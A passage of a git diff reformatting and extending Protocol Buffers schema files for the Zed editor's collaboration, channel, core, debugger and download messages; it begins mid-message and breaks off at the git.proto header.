excerpts = 3; - repeated Selection selections = 4; - optional Selection pending_selection = 5; - EditorAnchor scroll_top_anchor = 6; - reserved 7; - reserved 8; - double scroll_x = 9; - double scroll_y = 10; - } - - message ChannelView { - uint64 channel_id = 1; - Editor editor = 2; - } - - message ContextEditor { - string context_id = 1; - Editor editor = 2; - } + ViewId id = 1; + optional PeerId leader_id = 2; + optional PanelId panel_id = 6; + + oneof variant { + Editor editor = 3; + ChannelView channel_view = 4; + } + + reserved 5; + + message Editor { + bool singleton = 1; + optional string title = 2; + repeated Excerpt excerpts = 3; + repeated Selection selections = 4; + optional Selection pending_selection = 5; + EditorAnchor scroll_top_anchor = 6; + reserved 7; + reserved 8; + double scroll_x = 9; + double scroll_y = 10; + repeated PathExcerpts path_excerpts = 11; + } + + message ChannelView { + uint64 channel_id = 1; + Editor editor = 2; + } } message ExcerptInsertion { - Excerpt excerpt = 1; - optional uint64 previous_excerpt_id = 2; + Excerpt excerpt = 1; + optional uint64 previous_excerpt_id = 2; } message Excerpt { - uint64 id = 1; - uint64 buffer_id = 2; - Anchor context_start = 3; - Anchor context_end = 4; - Anchor primary_start = 5; - Anchor primary_end = 6; + uint64 id = 1; + uint64 buffer_id = 2; + Anchor context_start = 3; + Anchor context_end = 4; + Anchor primary_start = 5; + Anchor primary_end = 6; +} + +message ExcerptRange { + Anchor context_start = 1; + Anchor context_end = 2; + Anchor primary_start = 3; + Anchor primary_end = 4; +} + +message PathExcerpts { + PathKey path_key = 1; + uint64 buffer_id = 2; + repeated ExcerptRange ranges = 3; } message Contact { - uint64 user_id = 1; - bool online = 2; - bool busy = 3; + uint64 user_id = 1; + bool online = 2; + bool busy = 3; } message SetRoomParticipantRole { - uint64 room_id = 1; - uint64 user_id = 2; - ChannelRole role = 3; + uint64 room_id = 1; + uint64 user_id = 2; + ChannelRole role = 3; } diff --git a/crates/proto/proto/channel.proto b/crates/proto/proto/channel.proto index cada21cd5b7ede4730f2f4e71e98fb9a3dc12ff0..f1238b20a37815c9c6db999b8031a8eff2ba6cea 100644 --- a/crates/proto/proto/channel.proto +++ b/crates/proto/proto/channel.proto @@ -1,294 +1,294 @@ syntax = "proto3"; package zed.messages; -import "core.proto"; import "buffer.proto"; +import "core.proto"; message Channel { - uint64 id = 1; - string name = 2; - ChannelVisibility visibility = 3; - int32 channel_order = 4; - repeated uint64 parent_path = 5; + uint64 id = 1; + string name = 2; + ChannelVisibility visibility = 3; + int32 channel_order = 4; + repeated uint64 parent_path = 5; } enum ChannelVisibility { - Public = 0; - Members = 1; + Public = 0; + Members = 1; } message UpdateChannels { - repeated Channel channels = 1; - repeated uint64 delete_channels = 4; - repeated Channel channel_invitations = 5; - repeated uint64 remove_channel_invitations = 6; - repeated ChannelParticipants channel_participants = 7; - repeated ChannelBufferVersion latest_channel_buffer_versions = 9; + repeated Channel channels = 1; + repeated uint64 delete_channels = 4; + repeated Channel channel_invitations = 5; + repeated uint64 remove_channel_invitations = 6; + repeated ChannelParticipants channel_participants = 7; + repeated ChannelBufferVersion latest_channel_buffer_versions = 9; - reserved 8; - reserved 10 to 15; + reserved 8; + reserved 10 to 15; } message UpdateUserChannels { - repeated ChannelBufferVersion observed_channel_buffer_version = 2; - repeated ChannelMembership channel_memberships = 3; + repeated ChannelBufferVersion observed_channel_buffer_version = 2; + repeated ChannelMembership channel_memberships = 3; - reserved 1; + reserved 1; } message ChannelMembership { - uint64 channel_id = 1; - ChannelRole role = 2; + uint64 channel_id = 1; + ChannelRole role = 2; } message ChannelMessageId { - uint64 channel_id = 1; - uint64 message_id = 2; + uint64 channel_id = 1; + uint64 message_id = 2; } message ChannelPermission { - uint64 channel_id = 1; - ChannelRole role = 3; + uint64 channel_id = 1; + ChannelRole role = 3; } message ChannelParticipants { - uint64 channel_id = 1; - repeated uint64 participant_user_ids = 2; + uint64 channel_id = 1; + repeated uint64 participant_user_ids = 2; } message JoinChannel { - uint64 channel_id = 1; + uint64 channel_id = 1; } message DeleteChannel { - uint64 channel_id = 1; + uint64 channel_id = 1; } message GetChannelMembers { - uint64 channel_id = 1; - string query = 2; - uint64 limit = 3; + uint64 channel_id = 1; + string query = 2; + uint64 limit = 3; } message GetChannelMembersResponse { - repeated ChannelMember members = 1; - repeated User users = 2; + repeated ChannelMember members = 1; + repeated User users = 2; } message ChannelMember { - uint64 user_id = 1; - Kind kind = 3; - ChannelRole role = 4; + uint64 user_id = 1; + Kind kind = 3; + ChannelRole role = 4; - enum Kind { - Member = 0; - Invitee = 1; - } + enum Kind { + Member = 0; + Invitee = 1; + } } message SubscribeToChannels {} message CreateChannel { - string name = 1; - optional uint64 parent_id = 2; + string name = 1; + optional uint64 parent_id = 2; } message CreateChannelResponse { - Channel channel = 1; - optional uint64 parent_id = 2; + Channel channel = 1; + optional uint64 parent_id = 2; } message InviteChannelMember { - uint64 channel_id = 1; - uint64 user_id = 2; - ChannelRole role = 4; + uint64 channel_id = 1; + uint64 user_id = 2; + ChannelRole role = 4; } message RemoveChannelMember { - uint64 channel_id = 1; - uint64 user_id = 2; + uint64 channel_id = 1; + uint64 user_id = 2; } enum ChannelRole { - Admin = 0; - Member = 1; - Guest = 2; - Banned = 3; - Talker = 4; + Admin = 0; + Member = 1; + Guest = 2; + Banned = 3; + Talker = 4; } message SetChannelMemberRole { - uint64 channel_id = 1; - uint64 user_id = 2; - ChannelRole role = 3; + uint64 channel_id = 1; + uint64 user_id = 2; + ChannelRole role = 3; } message SetChannelVisibility { - uint64 channel_id = 1; - ChannelVisibility visibility = 2; + uint64 channel_id = 1; + ChannelVisibility visibility = 2; } message RenameChannel { - uint64 channel_id = 1; - string name = 2; + uint64 channel_id = 1; + string name = 2; } message RenameChannelResponse { - Channel channel = 1; + Channel channel = 1; } message JoinChannelChat { - uint64 channel_id = 1; + uint64 channel_id = 1; } message JoinChannelChatResponse { - repeated ChannelMessage messages = 1; - bool done = 2; + repeated ChannelMessage messages = 1; + bool done = 2; } message LeaveChannelChat { - uint64 channel_id = 1; + uint64 channel_id = 1; } message SendChannelMessage { - uint64 channel_id = 1; - string body = 2; - Nonce nonce = 3; - repeated ChatMention mentions = 4; - optional uint64 reply_to_message_id = 5; + uint64 channel_id = 1; + string body = 2; + Nonce nonce = 3; + repeated ChatMention mentions = 4; + optional uint64 reply_to_message_id = 5; } message RemoveChannelMessage { - uint64 channel_id = 1; - uint64 message_id = 2; + uint64 channel_id = 1; + uint64 message_id = 2; } message UpdateChannelMessage { - uint64 channel_id = 1; - uint64 message_id = 2; - Nonce nonce = 4; - string body = 5; - repeated ChatMention mentions = 6; + uint64 channel_id = 1; + uint64 message_id = 2; + Nonce nonce = 4; + string body = 5; + repeated ChatMention mentions = 6; } message AckChannelMessage { - uint64 channel_id = 1; - uint64 message_id = 2; + uint64 channel_id = 1; + uint64 message_id = 2; } message SendChannelMessageResponse { - ChannelMessage message = 1; + ChannelMessage message = 1; } message ChannelMessageSent { - uint64 channel_id = 1; - ChannelMessage message = 2; + uint64 channel_id = 1; + ChannelMessage message = 2; } message ChannelMessageUpdate { - uint64 channel_id = 1; - ChannelMessage message = 2; + uint64 channel_id = 1; + ChannelMessage message = 2; } message GetChannelMessages { - uint64 channel_id = 1; - uint64 before_message_id = 2; + uint64 channel_id = 1; + uint64 before_message_id = 2; } message GetChannelMessagesResponse { - repeated ChannelMessage messages = 1; - bool done = 2; + repeated ChannelMessage messages = 1; + bool done = 2; } message GetChannelMessagesById { - repeated uint64 message_ids = 1; + repeated uint64 message_ids = 1; } message MoveChannel { - uint64 channel_id = 1; - uint64 to = 2; + uint64 channel_id = 1; + uint64 to = 2; } message ReorderChannel { - uint64 channel_id = 1; - enum Direction { - Up = 0; - Down = 1; - } - Direction direction = 2; + uint64 channel_id = 1; + enum Direction { + Up = 0; + Down = 1; + } + Direction direction = 2; } message JoinChannelBuffer { - uint64 channel_id = 1; + uint64 channel_id = 1; } message ChannelBufferVersion { - uint64 channel_id = 1; - repeated VectorClockEntry version = 2; - uint64 epoch = 3; + uint64 channel_id = 1; + repeated VectorClockEntry version = 2; + uint64 epoch = 3; } message UpdateChannelBufferCollaborators { - uint64 channel_id = 1; - repeated Collaborator collaborators = 2; + uint64 channel_id = 1; + repeated Collaborator collaborators = 2; } message UpdateChannelBuffer { - uint64 channel_id = 1; - repeated Operation operations = 2; + uint64 channel_id = 1; + repeated Operation operations = 2; } message ChannelMessage { - uint64 id = 1; - string body = 2; - uint64 timestamp = 3; - uint64 sender_id = 4; - Nonce nonce = 5; - repeated ChatMention mentions = 6; - optional uint64 reply_to_message_id = 7; - optional uint64 edited_at = 8; + uint64 id = 1; + string body = 2; + uint64 timestamp = 3; + uint64 sender_id = 4; + Nonce nonce = 5; + repeated ChatMention mentions = 6; + optional uint64 reply_to_message_id = 7; + optional uint64 edited_at = 8; } message ChatMention { - Range range = 1; - uint64 user_id = 2; + Range range = 1; + uint64 user_id = 2; } message RejoinChannelBuffers { - repeated ChannelBufferVersion buffers = 1; + repeated ChannelBufferVersion buffers = 1; } message RejoinChannelBuffersResponse { - repeated RejoinedChannelBuffer buffers = 1; + repeated RejoinedChannelBuffer buffers = 1; } message AckBufferOperation { - uint64 buffer_id = 1; - uint64 epoch = 2; - repeated VectorClockEntry version = 3; + uint64 buffer_id = 1; + uint64 epoch = 2; + repeated VectorClockEntry version = 3; } message JoinChannelBufferResponse { - uint64 buffer_id = 1; - uint32 replica_id = 2; - string base_text = 3; - repeated Operation operations = 4; - repeated Collaborator collaborators = 5; - uint64 epoch = 6; + uint64 buffer_id = 1; + uint32 replica_id = 2; + string base_text = 3; + repeated Operation operations = 4; + repeated Collaborator collaborators = 5; + uint64 epoch = 6; } message RejoinedChannelBuffer { - uint64 channel_id = 1; - repeated VectorClockEntry version = 2; - repeated Operation operations = 3; - repeated Collaborator collaborators = 4; + uint64 channel_id = 1; + repeated VectorClockEntry version = 2; + repeated Operation operations = 3; + repeated Collaborator collaborators = 4; } message LeaveChannelBuffer { - uint64 channel_id = 1; + uint64 channel_id = 1; } message RespondToChannelInvite { - uint64 channel_id = 1; - bool accept = 2; + uint64 channel_id = 1; + bool accept = 2; } diff --git a/crates/proto/proto/core.proto b/crates/proto/proto/core.proto index 121ea749127d7af4bbc34da2a1edbad78b7763df..c721ab62a11620895f8d54e69b4eb0bf168e43d0 100644 --- a/crates/proto/proto/core.proto +++ b/crates/proto/proto/core.proto @@ -2,28 +2,28 @@ syntax = "proto3"; package zed.messages; message PeerId { - uint32 owner_id = 1; - uint32 id = 2; + uint32 owner_id = 1; + uint32 id = 2; } message User { - reserved 4; - uint64 id = 1; - string github_login = 2; - string avatar_url = 3; - optional string name = 5; + reserved 4; + uint64 id = 1; + string github_login = 2; + string avatar_url = 3; + optional string name = 5; } message Nonce { - uint64 upper_half = 1; - uint64 lower_half = 2; + uint64 upper_half = 1; + uint64 lower_half = 2; } message Collaborator { - PeerId peer_id = 1; - uint32 replica_id = 2; - uint64 user_id = 3; - bool is_host = 4; - optional string committer_name = 5; - optional string committer_email = 6; + PeerId peer_id = 1; + uint32 replica_id = 2; + uint64 user_id = 3; + bool is_host = 4; + optional string committer_name = 5; + optional string committer_email = 6; } diff --git a/crates/proto/proto/debugger.proto b/crates/proto/proto/debugger.proto index dcfb91c77dd0004bfb248d4e4c23dcf269b7bc11..bf29411f96a45a26265650727d1529e9351245d2 100644 --- a/crates/proto/proto/debugger.proto +++ b/crates/proto/proto/debugger.proto @@ -1,555 +1,553 @@ syntax = "proto3"; package zed.messages; -import "core.proto"; import "buffer.proto"; import "task.proto"; enum BreakpointState { - Enabled = 0; - Disabled = 1; + Enabled = 0; + Disabled = 1; } message Breakpoint { - Anchor position = 1; - BreakpointState state = 2; - reserved 3; - optional string message = 4; - optional string condition = 5; - optional string hit_condition = 6; - map session_state = 7; + Anchor position = 1; + BreakpointState state = 2; + reserved 3; + optional string message = 4; + optional string condition = 5; + optional string hit_condition = 6; + map session_state = 7; } message BreakpointSessionState { - uint64 id = 1; - bool verified = 2; + uint64 id = 1; + bool verified = 2; } message BreakpointsForFile { - uint64 project_id = 1; - string path = 2; - repeated Breakpoint breakpoints = 3; + uint64 project_id = 1; + string path = 2; + repeated Breakpoint breakpoints = 3; } message ToggleBreakpoint { - uint64 project_id = 1; - string path = 2; - Breakpoint breakpoint = 3; + uint64 project_id = 1; + string path = 2; + Breakpoint breakpoint = 3; } enum DapThreadStatus { - Running = 0; - Stopped = 1; - Exited = 2; - Ended = 3; + Running = 0; + Stopped = 1; + Exited = 2; + Ended = 3; } enum VariablesArgumentsFilter { - Indexed = 0; - Named = 1; + Indexed = 0; + Named = 1; } message ValueFormat { - optional bool hex = 1; + optional bool hex = 1; } message VariablesRequest { - uint64 project_id = 1; - uint64 client_id = 2; - uint64 variables_reference = 3; - optional VariablesArgumentsFilter filter = 4; - optional uint64 start = 5; - optional uint64 count = 6; - optional ValueFormat format = 7; + uint64 project_id = 1; + uint64 client_id = 2; + uint64 variables_reference = 3; + optional VariablesArgumentsFilter filter = 4; + optional uint64 start = 5; + optional uint64 count = 6; + optional ValueFormat format = 7; } enum SteppingGranularity { - Statement = 0; - Line = 1; - Instruction = 2; + Statement = 0; + Line = 1; + Instruction = 2; } message DapLocationsRequest { - uint64 project_id = 1; - uint64 session_id = 2; - uint64 location_reference = 3; + uint64 project_id = 1; + uint64 session_id = 2; + uint64 location_reference = 3; } message DapLocationsResponse { - DapSource source = 1; - uint64 line = 2; - optional uint64 column = 3; - optional uint64 end_line = 4; - optional uint64 end_column = 5; + DapSource source = 1; + uint64 line = 2; + optional uint64 column = 3; + optional uint64 end_line = 4; + optional uint64 end_column = 5; } enum DapEvaluateContext { - Repl = 0; - Watch = 1; - Hover = 2; - Clipboard = 3; - EvaluateVariables = 4; - EvaluateUnknown = 5; + Repl = 0; + Watch = 1; + Hover = 2; + Clipboard = 3; + EvaluateVariables = 4; + EvaluateUnknown = 5; } message DapEvaluateRequest { - uint64 project_id = 1; - uint64 client_id = 2; - string expression = 3; - optional uint64 frame_id = 4; - optional DapEvaluateContext context = 5; + uint64 project_id = 1; + uint64 client_id = 2; + string expression = 3; + optional uint64 frame_id = 4; + optional DapEvaluateContext context = 5; } message DapEvaluateResponse { - string result = 1; - optional string evaluate_type = 2; - uint64 variable_reference = 3; - optional uint64 named_variables = 4; - optional uint64 indexed_variables = 5; - optional string memory_reference = 6; + string result = 1; + optional string evaluate_type = 2; + uint64 variable_reference = 3; + optional uint64 named_variables = 4; + optional uint64 indexed_variables = 5; + optional string memory_reference = 6; } - message DapCompletionRequest { - uint64 project_id = 1; - uint64 client_id = 2; - string query = 3; - optional uint64 frame_id = 4; - optional uint64 line = 5; - uint64 column = 6; + uint64 project_id = 1; + uint64 client_id = 2; + string query = 3; + optional uint64 frame_id = 4; + optional uint64 line = 5; + uint64 column = 6; } enum DapCompletionItemType { - Method = 0; - Function = 1; - Constructor = 2; - Field = 3; - Variable = 4; - Class = 5; - Interface = 6; - Module = 7; - Property = 8; - Unit = 9; - Value = 10; - Enum = 11; - Keyword = 12; - Snippet = 13; - Text = 14; - Color = 15; - CompletionItemFile = 16; - Reference = 17; - Customcolor = 19; + Method = 0; + Function = 1; + Constructor = 2; + Field = 3; + Variable = 4; + Class = 5; + Interface = 6; + Module = 7; + Property = 8; + Unit = 9; + Value = 10; + Enum = 11; + Keyword = 12; + Snippet = 13; + Text = 14; + Color = 15; + CompletionItemFile = 16; + Reference = 17; + Customcolor = 19; } message DapCompletionItem { - string label = 1; - optional string text = 2; - optional string sort_text = 3; - optional string detail = 4; - optional DapCompletionItemType typ = 5; - optional uint64 start = 6; - optional uint64 length = 7; - optional uint64 selection_start = 8; - optional uint64 selection_length = 9; + string label = 1; + optional string text = 2; + optional string sort_text = 3; + optional string detail = 4; + optional DapCompletionItemType typ = 5; + optional uint64 start = 6; + optional uint64 length = 7; + optional uint64 selection_start = 8; + optional uint64 selection_length = 9; } message DapCompletionResponse { - uint64 client_id = 1; - repeated DapCompletionItem completions = 2; + uint64 client_id = 1; + repeated DapCompletionItem completions = 2; } message DapScopesRequest { - uint64 project_id = 1; - uint64 client_id = 2; - uint64 stack_frame_id = 3; + uint64 project_id = 1; + uint64 client_id = 2; + uint64 stack_frame_id = 3; } message DapScopesResponse { - repeated DapScope scopes = 1; + repeated DapScope scopes = 1; } message DapSetVariableValueRequest { - uint64 project_id = 1; - uint64 client_id = 2; - string name = 3; - string value = 4; - uint64 variables_reference = 5; + uint64 project_id = 1; + uint64 client_id = 2; + string name = 3; + string value = 4; + uint64 variables_reference = 5; } message DapSetVariableValueResponse { - uint64 client_id = 1; - string value = 2; - optional string variable_type = 3; - optional uint64 variables_reference = 4; - optional uint64 named_variables = 5; - optional uint64 indexed_variables = 6; - optional string memory_reference = 7; + uint64 client_id = 1; + string value = 2; + optional string variable_type = 3; + optional uint64 variables_reference = 4; + optional uint64 named_variables = 5; + optional uint64 indexed_variables = 6; + optional string memory_reference = 7; } message DapPauseRequest { - uint64 project_id = 1; - uint64 client_id = 2; - int64 thread_id = 3; + uint64 project_id = 1; + uint64 client_id = 2; + int64 thread_id = 3; } message DapDisconnectRequest { - uint64 project_id = 1; - uint64 client_id = 2; - optional bool restart = 3; - optional bool terminate_debuggee = 4; - optional bool suspend_debuggee = 5; + uint64 project_id = 1; + uint64 client_id = 2; + optional bool restart = 3; + optional bool terminate_debuggee = 4; + optional bool suspend_debuggee = 5; } message DapTerminateThreadsRequest { - uint64 project_id = 1; - uint64 client_id = 2; - repeated int64 thread_ids = 3; + uint64 project_id = 1; + uint64 client_id = 2; + repeated int64 thread_ids = 3; } message DapThreadsRequest { - uint64 project_id = 1; - uint64 client_id = 2; + uint64 project_id = 1; + uint64 client_id = 2; } message DapThreadsResponse { - repeated DapThread threads = 1; + repeated DapThread threads = 1; } message DapTerminateRequest { - uint64 project_id = 1; - uint64 client_id = 2; - optional bool restart = 3; + uint64 project_id = 1; + uint64 client_id = 2; + optional bool restart = 3; } message DapRestartRequest { - uint64 project_id = 1; - uint64 client_id = 2; - bytes raw_args = 3; + uint64 project_id = 1; + uint64 client_id = 2; + bytes raw_args = 3; } message DapRestartStackFrameRequest { - uint64 project_id = 1; - uint64 client_id = 2; - uint64 stack_frame_id = 3; + uint64 project_id = 1; + uint64 client_id = 2; + uint64 stack_frame_id = 3; } message ToggleIgnoreBreakpoints { - uint64 project_id = 1; - uint32 session_id = 2; + uint64 project_id = 1; + uint32 session_id = 2; } message IgnoreBreakpointState { - uint64 project_id = 1; - uint64 session_id = 2; - bool ignore = 3; + uint64 project_id = 1; + uint64 session_id = 2; + bool ignore = 3; } message DapNextRequest { - uint64 project_id = 1; - uint64 client_id = 2; - int64 thread_id = 3; - optional bool single_thread = 4; - optional SteppingGranularity granularity = 5; + uint64 project_id = 1; + uint64 client_id = 2; + int64 thread_id = 3; + optional bool single_thread = 4; + optional SteppingGranularity granularity = 5; } message DapStepInRequest { - uint64 project_id = 1; - uint64 client_id = 2; - int64 thread_id = 3; - optional uint64 target_id = 4; - optional bool single_thread = 5; - optional SteppingGranularity granularity = 6; + uint64 project_id = 1; + uint64 client_id = 2; + int64 thread_id = 3; + optional uint64 target_id = 4; + optional bool single_thread = 5; + optional SteppingGranularity granularity = 6; } message DapStepOutRequest { - uint64 project_id = 1; - uint64 client_id = 2; - int64 thread_id = 3; - optional bool single_thread = 4; - optional SteppingGranularity granularity = 5; + uint64 project_id = 1; + uint64 client_id = 2; + int64 thread_id = 3; + optional bool single_thread = 4; + optional SteppingGranularity granularity = 5; } message DapStepBackRequest { - uint64 project_id = 1; - uint64 client_id = 2; - int64 thread_id = 3; - optional bool single_thread = 4; - optional SteppingGranularity granularity = 5; + uint64 project_id = 1; + uint64 client_id = 2; + int64 thread_id = 3; + optional bool single_thread = 4; + optional SteppingGranularity granularity = 5; } message DapContinueRequest { - uint64 project_id = 1; - uint64 client_id = 2; - int64 thread_id = 3; - optional bool single_thread = 4; + uint64 project_id = 1; + uint64 client_id = 2; + int64 thread_id = 3; + optional bool single_thread = 4; } message DapContinueResponse { - uint64 client_id = 1; - optional bool all_threads_continued = 2; + uint64 client_id = 1; + optional bool all_threads_continued = 2; } message DapModulesRequest { - uint64 project_id = 1; - uint64 client_id = 2; + uint64 project_id = 1; + uint64 client_id = 2; } message DapModulesResponse { - uint64 client_id = 1; - repeated DapModule modules = 2; + uint64 client_id = 1; + repeated DapModule modules = 2; } message DapLoadedSourcesRequest { - uint64 project_id = 1; - uint64 client_id = 2; + uint64 project_id = 1; + uint64 client_id = 2; } message DapLoadedSourcesResponse { - uint64 client_id = 1; - repeated DapSource sources = 2; + uint64 client_id = 1; + repeated DapSource sources = 2; } message DapStackTraceRequest { - uint64 project_id = 1; - uint64 client_id = 2; - int64 thread_id = 3; - optional uint64 start_frame = 4; - optional uint64 stack_trace_levels = 5; + uint64 project_id = 1; + uint64 client_id = 2; + int64 thread_id = 3; + optional uint64 start_frame = 4; + optional uint64 stack_trace_levels = 5; } message DapStackTraceResponse { - repeated DapStackFrame frames = 1; + repeated DapStackFrame frames = 1; } message DapStackFrame { - uint64 id = 1; - string name = 2; - optional DapSource source = 3; - uint64 line = 4; - uint64 column = 5; - optional uint64 end_line = 6; - optional uint64 end_column = 7; - optional bool can_restart = 8; - optional string instruction_pointer_reference = 9; - optional DapModuleId module_id = 10; - optional DapStackPresentationHint presentation_hint = 11; + uint64 id = 1; + string name = 2; + optional DapSource source = 3; + uint64 line = 4; + uint64 column = 5; + optional uint64 end_line = 6; + optional uint64 end_column = 7; + optional bool can_restart = 8; + optional string instruction_pointer_reference = 9; + optional DapModuleId module_id = 10; + optional DapStackPresentationHint presentation_hint = 11; } message DebuggerLoadedSourceList { - uint64 client_id = 1; - repeated DapSource sources = 2; + uint64 client_id = 1; + repeated DapSource sources = 2; } message DapVariables { - uint64 client_id = 1; - repeated DapVariable variables = 2; + uint64 client_id = 1; + repeated DapVariable variables = 2; } // Remote Debugging: Dap Types message DapVariable { - string name = 1; - string value = 2; - optional string type = 3; - // optional DapVariablePresentationHint presentation_hint = 4; - optional string evaluate_name = 5; - uint64 variables_reference = 6; - optional uint64 named_variables = 7; - optional uint64 indexed_variables = 8; - optional string memory_reference = 9; + string name = 1; + string value = 2; + optional string type = 3; + // optional DapVariablePresentationHint presentation_hint = 4; + optional string evaluate_name = 5; + uint64 variables_reference = 6; + optional uint64 named_variables = 7; + optional uint64 indexed_variables = 8; + optional string memory_reference = 9; } message DapThread { - int64 id = 1; - string name = 2; + int64 id = 1; + string name = 2; } message DapScope { - string name = 1; - optional DapScopePresentationHint presentation_hint = 2; - uint64 variables_reference = 3; - optional uint64 named_variables = 4; - optional uint64 indexed_variables = 5; - bool expensive = 6; - optional DapSource source = 7; - optional uint64 line = 8; - optional uint64 column = 9; - optional uint64 end_line = 10; - optional uint64 end_column = 11; + string name = 1; + optional DapScopePresentationHint presentation_hint = 2; + uint64 variables_reference = 3; + optional uint64 named_variables = 4; + optional uint64 indexed_variables = 5; + bool expensive = 6; + optional DapSource source = 7; + optional uint64 line = 8; + optional uint64 column = 9; + optional uint64 end_line = 10; + optional uint64 end_column = 11; } message DapSource { - optional string name = 1; - optional string path = 2; - optional uint64 source_reference = 3; - optional DapSourcePresentationHint presentation_hint = 4; - optional string origin = 5; - repeated DapSource sources = 6; - optional bytes adapter_data = 7; - repeated DapChecksum checksums = 8; + optional string name = 1; + optional string path = 2; + optional uint64 source_reference = 3; + optional DapSourcePresentationHint presentation_hint = 4; + optional string origin = 5; + repeated DapSource sources = 6; + optional bytes adapter_data = 7; + repeated DapChecksum checksums = 8; } enum DapOutputCategory { - ConsoleOutput = 0; - Important = 1; - Stdout = 2; - Stderr = 3; - Unknown = 4; + ConsoleOutput = 0; + Important = 1; + Stdout = 2; + Stderr = 3; + Unknown = 4; } enum DapOutputEventGroup { - Start = 0; - StartCollapsed = 1; - End = 2; + Start = 0; + StartCollapsed = 1; + End = 2; } message DapOutputEvent { - string output = 1; - optional DapOutputCategory category = 2; - optional uint64 variables_reference = 3; - optional DapOutputEventGroup group = 4; - optional DapSource source = 5; - optional uint32 line = 6; - optional uint32 column = 7; + string output = 1; + optional DapOutputCategory category = 2; + optional uint64 variables_reference = 3; + optional DapOutputEventGroup group = 4; + optional DapSource source = 5; + optional uint32 line = 6; + optional uint32 column = 7; } enum DapChecksumAlgorithm { - CHECKSUM_ALGORITHM_UNSPECIFIED = 0; - MD5 = 1; - SHA1 = 2; - SHA256 = 3; - TIMESTAMP = 4; + CHECKSUM_ALGORITHM_UNSPECIFIED = 0; + MD5 = 1; + SHA1 = 2; + SHA256 = 3; + TIMESTAMP = 4; } message DapChecksum { - DapChecksumAlgorithm algorithm = 1; - string checksum = 2; + DapChecksumAlgorithm algorithm = 1; + string checksum = 2; } enum DapScopePresentationHint { - Arguments = 0; - Locals = 1; - Registers = 2; - ReturnValue = 3; - ScopeUnknown = 4; + Arguments = 0; + Locals = 1; + Registers = 2; + ReturnValue = 3; + ScopeUnknown = 4; } enum DapSourcePresentationHint { - SourceNormal = 0; - Emphasize = 1; - Deemphasize = 2; - SourceUnknown = 3; + SourceNormal = 0; + Emphasize = 1; + Deemphasize = 2; + SourceUnknown = 3; } enum DapStackPresentationHint { - StackNormal = 0; - Label = 1; - Subtle = 2; - StackUnknown = 3; + StackNormal = 0; + Label = 1; + Subtle = 2; + StackUnknown = 3; } message DapModule { - DapModuleId id = 1; - string name = 2; - optional string path = 3; - optional bool is_optimized = 4; - optional bool is_user_code = 5; - optional string version = 6; - optional string symbol_status = 7; - optional string symbol_file_path = 8; - optional string date_time_stamp = 9; - optional string address_range = 10; + DapModuleId id = 1; + string name = 2; + optional string path = 3; + optional bool is_optimized = 4; + optional bool is_user_code = 5; + optional string version = 6; + optional string symbol_status = 7; + optional string symbol_file_path = 8; + optional string date_time_stamp = 9; + optional string address_range = 10; } message DebugTaskDefinition { - string adapter = 1; - string label = 2; - string config = 3; - optional TcpHost tcp_connection = 4; + string adapter = 1; + string label = 2; + string config = 3; + optional TcpHost tcp_connection = 4; } message TcpHost { - optional uint32 port = 1; - optional string host = 2; - optional uint64 timeout = 3; + optional uint32 port = 1; + optional string host = 2; + optional uint64 timeout = 3; } message DebugLaunchRequest { - string program = 1; - optional string cwd = 2; - repeated string args = 3; - map env = 4; + string program = 1; + optional string cwd = 2; + repeated string args = 3; + map env = 4; } message DebugAttachRequest { - uint32 process_id = 1; + uint32 process_id = 1; } message DapModuleId { - oneof id { - uint32 number = 1; - string string = 2; - } + oneof id { + uint32 number = 1; + string string = 2; + } } message GetDebugAdapterBinary { - uint64 project_id = 1; - uint64 session_id = 3; - DebugTaskDefinition definition = 2; - uint64 worktree_id = 4; + uint64 project_id = 1; + uint64 session_id = 3; + DebugTaskDefinition definition = 2; + uint64 worktree_id = 4; } message DebugAdapterBinary { - optional string command = 1; - repeated string arguments = 2; - map envs = 3; - optional string cwd = 4; - optional TcpHost connection = 5; - string configuration = 7; - LaunchType launch_type = 8; - enum LaunchType { - Attach = 0; - Launch = 1; - } + optional string command = 1; + repeated string arguments = 2; + map envs = 3; + optional string cwd = 4; + optional TcpHost connection = 5; + string configuration = 7; + LaunchType launch_type = 8; + enum LaunchType { + Attach = 0; + Launch = 1; + } } message RunDebugLocators { - uint64 project_id = 1; - SpawnInTerminal build_command = 2; - string locator = 3; + uint64 project_id = 1; + SpawnInTerminal build_command = 2; + string locator = 3; } message DebugRequest { - oneof request { - DebugLaunchRequest debug_launch_request = 1; - DebugAttachRequest debug_attach_request = 2; - } + oneof request { + DebugLaunchRequest debug_launch_request = 1; + DebugAttachRequest debug_attach_request = 2; + } } message DebugScenario { - string label = 1; - string adapter = 2; - reserved 3; - DebugRequest request = 4; - optional TcpHost connection = 5; - optional bool stop_on_entry = 6; - optional string configuration = 7; + string label = 1; + string adapter = 2; + reserved 3; + DebugRequest request = 4; + optional TcpHost connection = 5; + optional bool stop_on_entry = 6; + optional string configuration = 7; } message LogToDebugConsole { - uint64 project_id = 1; - uint64 session_id = 2; - string message = 3; + uint64 project_id = 1; + uint64 session_id = 2; + string message = 3; } message GetProcesses { - uint64 project_id = 1; + uint64 project_id = 1; } message GetProcessesResponse { - repeated ProcessInfo processes = 1; + repeated ProcessInfo processes = 1; } message ProcessInfo { - uint32 pid = 1; - string name = 2; - repeated string command = 3; + uint32 pid = 1; + string name = 2; + repeated string command = 3; } diff --git a/crates/proto/proto/download.proto b/crates/proto/proto/download.proto index fd1d63e78db581866981cb90372f84716be8a958..44b1da3389abc2996e2fb9acf6e42d2b3ae54f44 100644 --- a/crates/proto/proto/download.proto +++ b/crates/proto/proto/download.proto @@ -5,32 +5,32 @@ import "core.proto"; import "worktree.proto"; message DownloadFileByPath { - uint64 project_id = 1; - uint64 worktree_id = 2; - string path = 3; - uint64 file_id = 4; + uint64 project_id = 1; + uint64 worktree_id = 2; + string path = 3; + uint64 file_id = 4; } message DownloadFileResponse { - uint64 file_id = 1; + uint64 file_id = 1; } message CreateFileForPeer { - uint64 project_id = 1; - PeerId peer_id = 2; - oneof variant { - FileState state = 3; - FileChunk chunk = 4; - } + uint64 project_id = 1; + PeerId peer_id = 2; + oneof variant { + FileState state = 3; + FileChunk chunk = 4; + } } message FileState { - uint64 id = 1; - optional File file = 2; - uint64 content_size = 3; + uint64 id = 1; + optional File file = 2; + uint64 content_size = 3; } message FileChunk { - uint64 file_id = 1; - bytes data = 2; + uint64 file_id = 1; + bytes data = 2; } diff --git a/crates/proto/proto/git.proto b/crates/proto/proto/git.proto index facaf43fd5ae3e7ff655f0b4006dc1661d503e10..9324feb21b1f50ac1041ed0afc8b59cb9b7fe2c6 100644 --- a/crates/proto/proto/git.proto +++ b/crates/proto/proto/git.proto @@ 